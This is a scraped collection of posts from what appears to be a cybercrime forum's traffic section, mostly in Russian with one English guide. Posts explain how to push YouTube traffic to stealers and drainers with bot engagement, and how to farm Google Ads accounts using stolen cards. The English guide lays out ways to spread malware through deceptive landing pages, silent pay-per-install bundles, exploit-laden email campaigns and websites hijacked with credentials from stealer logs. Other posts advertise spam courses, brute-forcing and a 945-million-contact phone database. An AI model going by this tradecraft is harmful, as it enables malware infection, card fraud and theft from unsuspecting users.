Если вас интересует, как работать в плюс, то скажу так : изучите предложения и виды реклам досконально, затем переходите к тестам. Необходимо создавать по несколько креативов на каждый оффер и тестировать каждый. Креативы подходят, которые идут в ногу со временем. При нахождении плюсового креатива, получается оффер- лучший креатив по результатам тестирования — залив трафика — профит.
Что нужно уметь :
Бюджет :
Достаточно трудный и размытый вопрос. В зависимости от используемой рекламы и
количества креативов, выделите себе конкретную сумму на тестирование. По
своему
примеру скажу, что на тесты расходую около 12 тысяч рублей на 6 креативов. Все
12 тысяч расходуются не без отдачи, конечно же. Какая-нибудь конверсия будет.
Но если
все связки не показали даже слабого плюса — прекращаю работу с оффером и ищу
новый.
Час одиночества продуктивнее недели разговоров
Click to expand...
Тут тоже можно почерпунть много интересного.
](https://drive.google.com/drive/folders/1FoJy_GlmDvvs_gBbrB_C9jkgLaOcodhr)
drive.google.com
Всем привет! Сейчас я попытаюсь описать самый простой способ залива на любой проект: будь то Стиллер, драйнер, Гэмбла, товарка - да что угодно.
Самое первое что стоит понять в 2023 году - соц сети действительно отличный источник траффика, который уже довольно хорошо изучен, чем мы и воспользуемся!
Много кто уже писал про YouTube и я как говорится не исключения. Но мой способ все таки отличается. Как мы знаем самый популярный способ это SEO - но я честно говоря не вижу в нем смысла, как по мне так, он уже мертв давно. Мы воспользуемся рекомендациями ютуб - что позволит нам избавится от соседей в наших логах. Логичный вопрос возникает у вас, а в чем же вас таки отличия ? Ответ прост - в том, что при таком способе человек не ищет что то, а ютуб ему рекомендует ваше видео к просмотру самостоятельно. Таким образом мы отсеиваем соседей, потому что после установки вашего файла - человек врядли пойдут искать софт дальше, потому что он изначально был не заинтересован в поиске, а лишь разведет руками. Плюс ко всему при Данном способе как я заметил - логи падают довольно таки не плохие.
Теперь поэтапно:
1. Делаем видео с обзором нашего софта, открытиям и тд. Все точно так же как
и при способе с SEO.
2. Для того что бы попасть в рекомендации, наше видео должно получить лайки,
просмотры, коменты и тд. Собственно накрутка
я использую телеграмм бота - t.me/PROMv_BOT (НЕ РЕКЛАМА!) просто то, что
удобно мне - если у вас есть другие сервисы можете поделится в комментариях к
теме. Там есть раздел «живые» - таким образом действительно качественно будет.
3. Описания - здесь действительно оно важно, должно быть по больше ключевых
слов в нем.
4. Тэги - вот их как раз и не надо!!! Абсолютно причем.
Так вот, выполняем 3 простых шага. Масштабируется и получаем отличный поток уникального траффика. Каналы кстати рекомендую покупать, а не создавать новые
Если где то ошибаюсь - поправьте, но лично я работал некоторое время по данному способу, было довольно таки не плохо. Статья просто для ознакомления - не нужно это хейтить, если не нравится - просто пройдите мимо)
Всем хай!
В этой статье хотел бы затронуть немало важную тему про самореги и их
создание.
**В первую очередь вы должны понимать что саморег это созданый гмейл аккаунт у
себя в антидетект браузере, простыми словами.
Но как и в других темах тут есть очень много подводных камней, и если вы
новичок то сразу разобраться будет не легко.
Если вы уже опытный фармер, то скорее всего вы понимаете что все дело в связке
и конкретном гео которое дает.
Палить связки которые использую сейчас я не буду, но могу поделиться связкой с
которой работал ранее.
1. Создаете профиль в андитедект браузере.
2. Вешаете проксю, на которой будете фармить.
3.Заходите в созданный профиль, создаете гмейл аккаунт.
В любом случае понадобиться смс сервис на котором вы будете принимать смс
чтобы зарегистировать аккаунт, либо же друие гугл сервисы без подтверждения
номера по смс, вы не зайдете.
Вот пару подхожящих вариантов по приему смс
1.
Первый это online sim: https://onlinesim.io/
2.
Второй : https://sms-activate.org/
Этих двух севрисов должно хватить.
Далее:
4.После создание гмейл аккаунта, заходите в адмоб(это инструмент, который
позволяет разработчикам получать доход от своих мобильных приложений,
показывая в них рекламу по заданным критериям)
5.Всегда давайте отлегу от суток и более для большего траста вашего аккаунта.
6.По истречению суток заходите в профиль, конкретнее в адмоб и вяжите ваши
платежные данные, тем самым создаете себе рабочий профиль.
7.Далее переходите в адс и создаете кампанию на смарт, поиск (белую) дабы
прогреть ваш саморег.
8.Вяжите карту, после или перед создания смарт кампании.
9.Через пару часов, заходите в ваш саморег и проверяете на актив.
Если блокировка, тут может быть очень много факторов по которым вы ее
получили:
1.Это гео, могли взять заезженное гео которое не дает.
2.Железо, как правильно настраивать свое железо поговорим в другой теме.
3.Платежка, в самореге и в целом в рабочем аккаунте все зависит от платежки,
70% блокировок мы получаем из-за платежного профиля: Таких как пп, анпейд, в
редких случаях, если заезженная карта, бин, может вылетить verify your
payment.
Когда есть рабочая связка которая дает, ни в коем случае не економьте на сс,
лично я беру сс от 15$, вне зависимости на продажу это или под личное
использование.
Поделюсь так же с вами шопом сс для ваших саморегов, и не только)
Но все равно, многие не хотят тратить столько времени и сил для создания
собстенного материала, качество которого может в разы превышать что сейчас
продают.
Связка актуальная, пользуйтесь на здоровье.
Лично сам пользуюсь другой связкой, процент валида в которой превышает 90%,
вчера сделал 20 саморегов, из них 20 акков валид.
Спокойно все льеться)
Про получение максимальных биллов и тд, отпишу в новой теме.
Все дело в гео и подходе.
Личние наработки я не палил, но даже такая инфа на начальном этапе очень
неплохо.
Можете задавать ваши вопросы по саморегам, постараюсь на все ответить.**
Сегодняшний курс продавался за 10.600₽
Как будем зарабатывать:
Зарабатывать мы будем на CPA-дорвеях (сгенерированных сайтах под партнёрские
программы) в три простых действия:
Изучив данный курс, Вы научитесь создавать CPA-дорвеи разного уровня
сложности. Работать со специальными программами для сбора контента, подготовки
его и генерации сайтов. Вникните в основы сайтостроения, приобретёте базовые
знания HTML и CSS.
Научитесь подбирать наиболее прибыльные связки дорвей-оффер для монетизации
своих сайтов. Масштабировать свои дорвей-сети и увеличивать доход при
минимальных телодвижениях и финансовых затратах.
Скачать:
You must have at least 1 reaction(s) to view the content.
Господа всем шалом! Поделитесь софтом или сервисом(недорогим) по накрутке
просмотров на Youtube.
Буду очень признателен
Здравствуйте однофорумчате, скажите пожалуйста, как можно на видео в Ютуб накрутить просмотров. Есть ли действующий способ увеличения просмотров и/или просмотров и лайков. Буду рад если у кого-то был опыт и он поделиться с ним
может кто подсказать актуальные способы войти на мыло или может кто оказывают
подобную услугу?
в пм
страна UK
Добрый день, подскажите пожалуйста, как перебрать почты ,чтобы чеканные и взломанные в мусор , нормальные отложить какая программа подскажите ?
Очень прошу помочь знающих людей.
Никогда не имел дела с лендами и подобным трафиком. Клоаки и так далее для
меня темный лес.
Очень прошу помочь советом, с чего вообще можно начать, где взять ленд и как
настроить его и клоаку.
Хотя бы ссылки на инфу, мануалы.
Ребят , только без негатива ? . Нашел ваш форум, оооочень интересный и много всего.
воркал авито, адвертинг, но всегда интересовала тема о трафиках, загрузках и т.д. Прибыльно ли этой? Если да, с чего начать? Что лучше всего изучить. Или лучше изучать вирусологию? Выучиваю много чего и быстро
Ток без негатива, а то на лолзе новокеков готовы убить
Приветствую!
Подскажите, не могу разобраться как брутить аккаунты?
Вот берем базу огромную mail;pass ставим ее в чекер, ни одного рабочего
аккаунта.
Для чего их тогда выкладывают? Можете подсказать куда копать?
Спасибо
Подкиньте идею куда можно сливать микс траф с лома не касаясь стилеров и прочих подобных вещей. Есть офферы которые нормально такой траф конвертят?
Spoiler
Spoiler
You must spend at least 7 day(s) on the forum to view the content.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/aygTESSa#6FElXXifWrXtj3lpRPoEXg)
mega.nz
Всем привет!
Подскажите, есть ли такая тема как боты, которые будут общаться в чате между
собой?
Если есть посоветуйте плз спеца, либо софт. Буду благодарен!
) Серый дейт арбитраж (2020)
](https://cloud.mail.ru/public/xUsu/ewLjwcPjc)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
(2021) ](https://cloud.mail.ru/public/8Er2/hBB7QkS7b)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
(2021) ](https://cloud.mail.ru/public/jVdw/mgWUc2CbJ)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
Facebook (2021) ](https://cloud.mail.ru/public/WzCP/pVpqzFsfj)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
](https://cloud.mail.ru/public/Aovw/se8WxuodW)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-13382-99-0-0.202205161007%2Ffavicon.svg&hash=6c956167bb1b4dbac1072846173d0d0f&return_error=1) cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
](https://cloud.mail.ru/public/oLeg/q4ea4bjEr)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
](https://cloud.mail.ru/public/41tW/4DAMEah6F)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F6jthIYkBdecaLwm8yXZPKuI1HW7.png&hash=b0d5b13490a25fa31bdcd9938218b7e3&return_error=1)
](https://disk.yandex.ru/d/Vrg2hwutaq7Ffg)
Посмотреть и скачать с Яндекс Диска
![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) disk.yandex.ru
](https://cloud.mail.ru/public/4Cmj/jEnrfNQpB)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
](https://cloud.mail.ru/public/28sa/4gakQBt2h)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
бесплатный трафик с топовых YouTube видео ](https://cloud.mail.ru/public/2MWh/TiGFrEnqr)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
гарантией — [RICHADVERT] ](https://cloud.mail.ru/public/3Yh3/v7N44Pu83)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
SMM (2020) ](https://cloud.mail.ru/public/24g7/3TjvEUWVE)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-13237-97-0-1.202204130840%2Ffavicon.ico&hash=2cb4d47428a905521d62a06dc61cbb2a&return_error=1) cloud.mail.ru
](https://drive.google.com/drive/folders/1EmQxAr2d_8aRUmRbeZ8CJeRWT-IfWOTn)
drive.google.com
](https://cloud.mail.ru/public/2uCP/ykzqD51ok)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
трафика с гарантией ](https://cloud.mail.ru/public/3hw4/3yx21ZhEW)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
Посмотреть и скачать с Яндекс Диска
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) yadi.sk
![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F6jthIYkBdecaLwm8yXZPKuI1HW7.png&hash=b0d5b13490a25fa31bdcd9938218b7e3&return_error=1)
вложений ](https://disk.yandex.ru/d/UYhN1hFwAnxVkg)
Посмотреть и скачать с Яндекс Диска
![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) disk.yandex.ru
рекламы 20-ый поток [Алексей Князев] ](https://cloud.mail.ru/public/2g4i/4wxyW7wku)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
](https://telegra.ph/Sozdanie-fejkovyh-sajtov-na-avtomate-i-poluchenie- trafika-03-20)
Система фейковых сайтов чем-то напоминает систему дорвеев (извиняюсь за тавтологию). Однако, не требует приложения столько усилий в создании как доры. Не нужно отбирать и собирать базу кеев, не требует СЯ, шаблонов и прочей ерунды которая сильно усложняет жизнь дорвейщика. Но фейки приносят...
telegra.ph
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fhome- static%2F_%2F90%2F9034470dfcb0bea0db29a281007b8a38.png&hash=465880dd90e12dabc6b8bdd2a593f5cf&return_error=1)
Finds everything
yadi.sk
](https://cloud.mail.ru/public/5Rug/zVvTc1jqh)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fhome- static%2F_%2F90%2F9034470dfcb0bea0db29a281007b8a38.png&hash=465880dd90e12dabc6b8bdd2a593f5cf&return_error=1)
Finds everything
yadi.sk
](https://cloud.mail.ru/public/39da/4UvovZyhL)
Вам открыли доступ к файлу. Отправлено с помощью Облако Mail
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fhome- static%2F_%2F90%2F9034470dfcb0bea0db29a281007b8a38.png&hash=465880dd90e12dabc6b8bdd2a593f5cf&return_error=1)
Finds everything
yadi.sk
на Push-уведомления (2019) ](https://cloud.mail.ru/public/57kM/drcpqvUx6)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
](https://cloud.mail.ru/public/3nBc/4YARvrzx3)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Дунаев и Цветаев ](https://cloud.mail.ru/public/BAVG/HbKtJG1Nz)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
](https://cloud.mail.ru/public/5CLq/5fE2fsJeJ)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
](https://cloud.mail.ru/public/3KmQ/NHR4wW84C)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
](https://cloud.mail.ru/public/3RzH/4yQcahQxC)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
(1).pdf ](https://cloud.mail.ru/public/4h7Y/cRD7kxMtt)
Вам открыли доступ к файлу. Отправлено с помощью Облако Mail
cloud.mail.ru
](https://cloud.mail.ru/public/3uHJ/3RzEeK7c1)
Скачивайте файлы из папки или сохраняйте к себе в Облако
cloud.mail.ru
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-12971-93-7-0.202202080649%2Ffavicon.ico&hash=0eb25ffc77770eb20ec5943b17932575&return_error=1) cloud.mail.ru
Здравствуйте, для Вас доступен курс по такому перспективному источнику как Google Ads и объектом продаж станет Азия. Почему Азия? Во-первых большие перспективы (об этом позже), во-вторых - сравнительно недорогой трафик. Я чаще всего работаю на США и американский трафик стоит на самом деле немало...
![myagkov.biz](/proxy.php?image=https%3A%2F%2Fmyagkov.biz%2Fwp- content%2Fuploads%2F2019%2F06%2Ficon.png&hash=baae67930fa7b5c40a92b04207d07837&return_error=1) myagkov.biz
Доброго времени суток!
Решил написать статью об этой фичи.
Берем контекстный ключ и чекаем в Яндексе.
Нам интересно 2 пункта:
1. На какой странице ВК и есть ли группа под наш ключ
2. Сколько подписчиков в группе.
Чтобы попасть по этому ключу в Яндекс с нашей группой, нужно перегнать по
подписчикам конкурента.
(Мы лично ботов заказывали)
Благодаря этой фичи получалось зарабатывать +10к руб в месяц с органики.|
Я думаю под очень нишевые ключи подойдет хорошо.
Курс [Boberman] «Лучшее обучение рассылкам V 2.0»
Легендарный курс по рассылкам, который содержит в себе подробнейшее объяснение каждого этапа. Автор предоставляет весь необходимый софт для начала работы: майлер для работы, чекеры/парсеры.
Программа обучения:
Блок №0 - Подготовка
Блок №1 - Введение
Блок №2 - Софт
Блок №3 - Расходные материалы
Блок №4 - Тестовые отправки
Блок №4.1 - Создание фермы
Блок №5 - Партнерские программы
Блок №6 - Подготовка к массовой рассылке
Блок №7 - Аналитика результата
Блок №8 - Безопасность и финансы
Подойдет как для пролива своих фишей, так и для ваших идей...
скачать : https://mega.nz/file/1AglhKCQ#7s1Ny8IGbIhhF70shiPe-GQ4gDQQlvEsCdrtG0Dx6F8
Can anyone show the way how to send 500-1k emails per day in inbox france domains? I tried with Mailer, AMS Enterprise on clean RDP. Every email goes to SPAM on any domain. I buyed Mailers, SMTP's from shops...nothing. I created a HTML letter from scratch. What do I do wrong? Where I must to look?
https://dropmefiles.com/G1uub
Может быть кто-то найдет для себя что-то полезное в этом мануале. Лично я взял
пару моментов на вооружение.
Ребят, какие слитые курсы по-настоящему полезные? Бюджет маленький 400-500$, возможности нон-стоп покупать логи нет( Хотелось бы научиться качать самокеки самому
Привет иксы, хочу начать лить траффик, почитал про направление и понял что
самое выгодное это fb ads и google ads.
Так же можно лить ролики в tiktok и youtube shorts, и кидать всех на
сокращатель ссылок с рекламой.
Кто уже давно занимается и готов поделиться годной инфой, сделайте
это
Я буду очень благодарен.
Для работы у меня есть отличный антидетект браузер, шоп с проксями под любую
страну, и огромное желание заниматься траффиком
Трафферство умирает , ищу новую нишу
Хочу спросить , вдруг кто поможет
Есть RedLine, на что пролить думаете? Только не гейм тематика, желательно чтобы был фб и всякие такие плюшки, если хорошая тема будет - отблагодарю щедро
I am still wondering if I am writing an on-topic thread or not, lets's just simply dive into info.
First of all, spreading work is very boring work.. and without proper guidance, it's almost a disaster. so, I include these three methods to make things easier.
1. spreading via traffic
2. spreading via PPI networks, also.
3. spreading via vulnerability
so let's start with the first method, on live traffic.
1. spreading via traffic
when you use an ad network to perform installs you first need a CPA-based ad
network. CPA stands for cost per action or performance-based marketing as
redefined part.
a CPA network is a part of the advertising industry that mainly focuses on
actions or is called a complete task. let's assume we have opened the browser.
the first thing the browser will do is give us an identity for eg: Unknown.
when we first open a search engine and search some text we are identified as a
user
when we reach a certain website according to our search we become traffic
when we choose some from websites like a product or something and checkout. we
become a customer.
the main focus of CPA network is making customers.
not only CPA ad networks but also landing pages are needed. the full list is:
a) CPA ads network or performance-based ad network
b) landing pages
c) tracking
d) approval
continuing about landing pages, you need to design your landing pages so it
will not be downloading files by forcing but tricking. it isn't bad using a
download button. also, it's the basic approval phenomenon you should be aware
of. other than this, it'll be healthy if you use redirect between multiple
landing pages.
Redirect will help you to the direction of the traffic on the second landing page which is saying download file. you do redirect because putting a redirect download page on the ads network isn't allowed.. more you can learn with their blog section.
According to google search, when you have a redirect landing page, nothing is shown to the user when the landing page is being redirected to the final URL
you should avoid it in websites, only use it for setting up a redirect for landing to redirect page to offer page to avoid campaign disapproval policies
tracking is useful for making a campaign URL as well as the place where you'll set up your landing pages and offer URL. an offer is simply a task that will get performed. and tracking will let know exactly what task was performed or not it's different than ads network impression stats.
on approval, I already wrote in the landing pages section. also, the campaign
design guidelines can be found in ads network setup campaign guides.
The next part is pay per install.
2. Pay per install network
A few years back some Israeli companies come together to provide a service of
monetization downloads. simply converting download/software sites.
the idea itself makes their cluster "download velly". also, very less people
know about it. the pay per install companies is still offering money to their
download bloggers to obtain some fresh conversation which is exclusively
called installs.
the PPI also has sub-parts where you could look for buying android traffic
from CPI networks. as well as mac installs as they claimed.
The working principle of the PPI ad network is very straight like a gay! and I don't care what homos do. also, the technique behind PPI can be used to create an own network of installs by involving video/software/music/torrent websites.
simply the campaign setup is like an offer fillup form:
Greetings! thanks.
---------start---------------
-> for desktop software — Exe installer running in silent mode,
-> which company do you represent?
-> a brief description of the product in 1-2 sentences;
-> logo;
-> license agreement;
-> privacy policy;
-> how much are you willing to pay to install your software? Provide information in the context of the GEO you are interested in (in the format GEO = price);
-> what is your budget for distribution purposes and is this a one-time promotion, are you ready to work permanently?
-> do you have a system for collecting statistics (sending back, perhaps you are ready to provide us with statistics by mail) or will we need to collect them ourselves?
-> specify which type of distribution you are interested in:
- embedding in software/game installers
- banner (example of a banner used to advertise one of the suppliers -
https://www.dropbox.com/s/sr2qz7fhevxws83/img-2019-08-21-12-03-23.png?dl=0 )
-> can you provide a suggestion screen and text for promotional materials?
-> do you only accept traffic from desktop computers or also from mobile devices? Which OS?
-> what method of monetization of your software do you use?
We will also be glad to cooperate!d.
-----------end--------------------
The third way to gain installs in bulk and mainly mass spreading is all about sending emails to valid lists.
3. Spreading via exploits
the vulnerability of the machine is simply attacked, an exploiter can do
various tasks unlike sending a file extension directly we can parse its code
to another extension that will carry the malicious file, and it's something
like a trojan horse.
I think most of us are aware of exploits. doc, pdf, link, xll, etc. so let's
talk about how we can use an exploit for mass spreading.
a) via mailers to reach inbox files.
b) via fake websites offering to download unique material.
using mailers is for starting an email campaign and spreading files to email inboxes. another part of setting email campaigns is :
a.a) simple mail transfer protocol
a.b) a mailer, of course.
a.c) email list - valid
a.d) a good letter
on the other hand, setting up fake websites needs a lot of time. but you can make the process faster with driving traffic.
Bonus method,
The fourth method I wish to write is spreading via old logs.
yes, it's a good part of a when it comes to stealer data, especially where no one looks, the work is to search through logs and collect hosting accounts for websites with a satisfactory amount of traffic. you can collect 20-30 websites with a good amount of traffic, furthermore, hijack the domain for using it to send traffic to a fake website or add your download ads to them.
the monthly traffic charts can be obtained online. the internet is very huge. we can simply look for sites that tell other website traffic.
other than these 4 methods others are known like:
a) botshops - A telegram shops that drive loader-based traffic
b) youtube/Facebook - very costly but good decent results in the end.
c) forum, telegram, reply sections on blogs.
In final words, the usage of these methods for discovering new methods is possible. it takes less time to do than think.
Насколько актуально будит сервис по такому виду спама?
С ценой 150$ за 1к гудов, +/-
Spoiler: VT
https://www.virustotal.com/gui/file...e823cc6b0b03db50240e1ba6e1c51cbfdc2?nocache=1
Spoiler: Proxy http/https
Spoiler: Скачать
https://disk.yandex.ru/d/mKazsBABODhmIA
Spoiler: Пароль
mobi50
Занимаюсь траффиком, лью на стилак. Уже на протяжении полугода результат один и тот-же, спокойно наливаю по 100-150 логов за день. Лью с ютюба, в основном игровой трафик. Устал, тотально выгораю, хочется вдохнуть свежего воздуха. Куда идти, как развиваться в этом направлении? Были замечательные времена, когда лил по 800 логов, но к сожалению Cookie Creator умер, хочется примерно вернуться к тем же суммам.
Почему с начала месяца по данный день летят баны за подозрительные платежи ?
Со всех логов со всех ключей
Всех решительно приветстсвую. Буду благодарен за любую инфу и наводки по сей теме. Траф под инсталлы.
Hey guys, sorry for writing this post in English, and i do not want to use a translator as the translation will be bad.
I want to let you know that i have unlimited access to SMS and i also have a worldwide database of phone numbers + names (945 millions unique contact), i am ready to collaborate on any kind of monetization project. I am really lost and i don't know what to do with this. DM here or telegram @blaserkey
**Этот материал дохотчево объясняет принцип работы Mail Spamming 'a, хорош для
тех кто ничего не знает, но хочет влиться в эту сферу.
Я не претендую на авторство этой статьи, она сделана не мной, а англоязычными
ребятами: LatinKings и Python, информацию о которых я найти так и не смог .
Spoiler: Содержание
1. Терминология (общая и спаммерска).
2. Способы спама.
3. Спам с помощью SMTP и AMS.
4. Спам с помощью PHP Mailer.
5. + и - каждого способа.
6. "Золотые" советы для спама.
**
Spoiler: Оригинал
https://anonfiles.com/H2i7r1Bcx0/SPAMMING_pdf
https://www.virustotal.com/gui/file...fcb3822fd16afffa31cdb039cef2ebcb392/detection
Spoiler: Любительский перевод.
https://telegra.ph/Spam-pocht-01-11
P.S дата создания гайда - неизвестна.
Собственн сабж, интересует трафф на лэнды и ЮТ канал, готов рассмотреть
различные варианты, чтобы было интересно и вам и мне.
в ЛС плз
Описание:
Кредитные лимиты гугла, это именно тот инструмент который позволяет человеку с
минимальными знаниями и пониманиями источника сразу получать прибыль с
трафика.
Это очевидный факт, невозможно слить в минус то за что не платишь!
Вы научитесь:
Вы не будете платить за рекламу, ВНИМАНИЕ, получая при этом самый качественный
трафик в мире!
Никто не будет спорить что трафик с гугла имеет лучшее качество.
**Окупаемость этого воркшопа 1 день, вне зависимости от обстоятельств
Ссылка:
https://dropmefiles.com/LiHlZ**
Всем привет
Надеюсь Вы не против если я перейду сразу к сути
В общем если бы Вы знали сколько "горя я хапнул" с поиском качественного
трафика для "своего самописа".....
И наконец то понял, что "его" просто напросто не существует, если ты не готов
вложиться, я начал вкладывать $$$$$, кошелёк оказался не резиновый, попадались
разного рода мошенники, которые всячески пытались выманить хотя-бы двадцатку
долларов вперед, при этом не давая теста, типа: - "скинь 20 баксов, нам нужно
удостовериться в твоей платежеспособности"
Ну мы "не лыком шиты....", мы перестали давать копеечку, и соответсвенно
отсеивались "лишние торговцы"
Тут мой взгляд упал на один сервис(не реклама,
кликабельно), там куча различных паблишеров, которые
предлагают свои услуги напрямую клиенту, CPI, CPA, PPI, PPC и дальше по списку
разных basis
Так как мне нужен был инсталл на "мой самопис". я положил взгляд на PPI (Post
Per Install). Нашел пару-тройку неплохих паблишеров, которые предоставили мне
тестовые инсталлы, всё было гладко, до пополнения мною их баланса круглой
суммой.... тут смотрю нету человека, нету моих денег, нету соответсвенно
инсталлов...
Ну и наконец, моё терпение лопнуло, кошелек начал плакать.... Я снова пришел
